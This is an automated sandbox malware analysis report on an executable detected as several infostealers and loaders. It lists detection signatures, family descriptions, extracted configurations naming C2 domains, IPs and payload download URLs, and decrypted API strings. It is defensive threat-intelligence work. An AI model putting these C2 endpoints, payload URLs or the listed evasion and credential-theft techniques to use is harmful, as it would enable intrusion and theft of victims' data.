Windows Analysis Report
1CMweaqlKp.exe

Overview

General Information

Sample name: 1CMweaqlKp.exe
renamed because original name is a hash value
Original sample name: 8a19d654cb37e4e51be045acaf097e74.exe
Analysis ID: 1436254
MD5: 8a19d654cb37e4e51be045acaf097e74
SHA1: 7a3a86421a806d2ba66ae84e86305847c8b1f766
SHA256: 59b3af1a244a082219116ed9b496de99236b01ae42df75bf4211ed2b7069bc4b
Tags: 32exetrojan
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Mars stealer
Yara detected RedLine Stealer
Yara detected RisePro Stealer
Yara detected SmokeLoader
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates HTML files with .exe extension (expired dropper behavior)
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Disables UAC (registry)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
 https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 1CMweaqlKp.exe Avira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: 185.215.113.67:26260 Avira URL Cloud: Label: malware
Source: http://147.45.47.102:57893/hera/amadka.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\1000021002\ac861238af.exe Avira: detection malicious, Label: TR/AutoIt.zstul
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amert[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe Avira: detection malicious, Label: TR/Redcap.pernp
Found malware configuration
Source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
Source: 00000033.00000003.2152173443.0000000003680000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.150/c698e1bc8a2f5e6d.php"}
Source: 39.2.NewB.exe.e50000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": "185.172.128.19/ghsdh39s/index.php", "Version": "4.12"}
Source: 40.0.jok.exe.7c0000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["185.215.113.67:26260"], "Bot Id": "Test1234", "Authorization Header": "bed37b7c341f364ee692c5adfa824881"}
Source: 29.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["pillowbrocccolipe.shop", "communicationgenerwo.shop", "diskretainvigorousiw.shop", "affordcharmcropwo.shop", "dismissalcylinderhostw.shop", "enthusiasimtitleow.shop", "worryfillvolcawoi.shop", "cleartotalfisherwo.shop", "affordcharmcropwo.shop"], "Build id": "LGNDR1--ketamine"}
Multi AV Scanner detection for domain / URL
Source: 185.215.113.67:26260 Virustotal: Detection: 16% Perma Link
Source: pillowbrocccolipe.shop Virustotal: Detection: 18% Perma Link
Source: cleartotalfisherwo.shop Virustotal: Detection: 18% Perma Link
Source: http://185.172.128.150/c698e1bc8a2f5e6d.php Virustotal: Detection: 19% Perma Link
Source: https://affordcharmcropwo.shop/d Virustotal: Detection: 9% Perma Link
Source: worryfillvolcawoi.shop Virustotal: Detection: 18% Perma Link
Source: https://affordcharmcropwo.shop/z Virustotal: Detection: 13% Perma Link
Source: http://193.233.132.56/cost/lenin.exe1 Virustotal: Detection: 21% Perma Link
Source: diskretainvigorousiw.shop Virustotal: Detection: 18% Perma Link
Source: communicationgenerwo.shop Virustotal: Detection: 17% Perma Link
Source: http://147.45.47.102:57893/hera/amadka.exe Virustotal: Detection: 19% Perma Link
Source: https://junglethomas.com/ Virustotal: Detection: 11% Perma Link
Source: http://193.233.132.56/cost/go.exe Virustotal: Detection: 25% Perma Link
Source: affordcharmcropwo.shop Virustotal: Detection: 17% Perma Link
Source: http://193.233.132.56/cost/go.exemadka.ex Virustotal: Detection: 21% Perma Link
Source: enthusiasimtitleow.shop Virustotal: Detection: 17% Perma Link
Source: https://affordcharmcropwo.shop/api Virustotal: Detection: 21% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Virustotal: Detection: 52% Perma Link
Source: C:\Users\user\1000021002\ac861238af.exe Virustotal: Detection: 34% Perma Link
Source: C:\Users\user\AppData\Local\5LzADXbR9e1baIzvWufsCa70.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\5LzADXbR9e1baIzvWufsCa70.exe Virustotal: Detection: 44% Perma Link
Source: C:\Users\user\AppData\Local\5W1aDm1vpFLN4gyrIiISMc4h.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\5W1aDm1vpFLN4gyrIiISMc4h.exe Virustotal: Detection: 43% Perma Link
Source: C:\Users\user\AppData\Local\8sXk5E4IG9n4ZHu2M9Littnp.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\8sXk5E4IG9n4ZHu2M9Littnp.exe Virustotal: Detection: 72% Perma Link
Source: C:\Users\user\AppData\Local\9SmQs0R4T5RJUISklvcv02zp.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\9SmQs0R4T5RJUISklvcv02zp.exe Virustotal: Detection: 43% Perma Link
Source: C:\Users\user\AppData\Local\9WrQ2c2u5fxH1pcvCwwjGhdd.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\9WrQ2c2u5fxH1pcvCwwjGhdd.exe Virustotal: Detection: 72% Perma Link
Source: C:\Users\user\AppData\Local\Aghrmi42Lz5QvS8u8U6BiVXQ.exe ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Aghrmi42Lz5QvS8u8U6BiVXQ.exe Virustotal: Detection: 43% Perma Link
Source: C:\Users\user\AppData\Local\Bkg8NSHXvizTVBsjT3dzRvci.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Bkg8NSHXvizTVBsjT3dzRvci.exe Virustotal: Detection: 72% Perma Link
Source: C:\Users\user\AppData\Local\C893DEcM3dAA247WrHBz1SDW.exe ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\C893DEcM3dAA247WrHBz1SDW.exe Virustotal: Detection: 43% Perma Link
Source: C:\Users\user\AppData\Local\CmCQsbfi77SnYQWckHTzUjRg.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\CmCQsbfi77SnYQWckHTzUjRg.exe Virustotal: Detection: 44% Perma Link
Source: C:\Users\user\AppData\Local\H3bqnZf96LFIOlogieo3h5K9.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\H3bqnZf96LFIOlogieo3h5K9.exe Virustotal: Detection: 44% Perma Link
Source: C:\Users\user\AppData\Local\KHojJ9v7XtNSHZfW6gAnnH23.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\KHojJ9v7XtNSHZfW6gAnnH23.exe Virustotal: Detection: 43% Perma Link
Source: C:\Users\user\AppData\Local\LIdx8BlqmZTW07MQOtXboF4f.exe ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\LIdx8BlqmZTW07MQOtXboF4f.exe Virustotal: Detection: 36% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4767d2e713f2021e8fe856e3ea638b58[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4767d2e713f2021e8fe856e3ea638b58[1].exe Virustotal: Detection: 44% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe Virustotal: Detection: 84% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amert[1].exe Virustotal: Detection: 57% Perma Link
Multi AV Scanner detection for submitted file
Source: 1CMweaqlKp.exe ReversingLabs: Detection: 50%
Source: 1CMweaqlKp.exe Virustotal: Detection: 44% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\9WrQ2c2u5fxH1pcvCwwjGhdd.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\5W1aDm1vpFLN4gyrIiISMc4h.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Bkg8NSHXvizTVBsjT3dzRvci.exe Joe Sandbox ML: detected
Source: C:\Users\user\1000021002\ac861238af.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\KHojJ9v7XtNSHZfW6gAnnH23.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sarra[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\file300un[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\9SmQs0R4T5RJUISklvcv02zp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\5LzADXbR9e1baIzvWufsCa70.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Aghrmi42Lz5QvS8u8U6BiVXQ.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\C893DEcM3dAA247WrHBz1SDW.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\8sXk5E4IG9n4ZHu2M9Littnp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\CmCQsbfi77SnYQWckHTzUjRg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4767d2e713f2021e8fe856e3ea638b58[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\GIz2DLitsyoTn14REJti2nqN.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amert[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\H3bqnZf96LFIOlogieo3h5K9.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 1CMweaqlKp.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: lstrcatA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: OpenEventA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateEventA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CloseHandle
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Sleep
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: VirtualFree
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: VirtualAlloc
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: lstrlenA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ExitProcess
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: user32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateDCA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sscanf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: VMwareVMware
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HAL9TH
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: JohnDoe
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DISPLAY
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %hu/%hu/%hu
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: http://52.143.157.84
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: /c73eed764cc59dcb.php
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: /84bad7132df89fd7/
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: pisun
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GlobalLock
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HeapFree
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetFileSize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GlobalSize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Process32Next
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Process32First
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: LocalFree
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: FindClose
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ReadFile
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: WriteFile
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateFileA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CopyFileA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetLastError
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GlobalFree
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: OpenProcess
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: TerminateProcess
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ole32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: wininet.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: shell32.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: psapi.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: rstrtmgr.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SelectObject
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BitBlt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DeleteObject
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipDisposeImage
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GdipFree
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetHGlobalFromStream
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CoUninitialize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CoInitialize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CoCreateInstance
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetDC
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CloseWindow
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: wsprintfA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CharToOemW
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: wsprintfW
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RegEnumValueA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CryptBinaryToStringA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: StrStrA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: StrCmpCW
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PathMatchSpecA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: GetModuleFileNameExA
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RmStartSession
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RmRegisterResources
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RmGetList
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: RmEndSession
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_open
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_step
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_column_text
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_finalize
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_close
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_column_bytes
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3_column_blob
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: encrypted_key
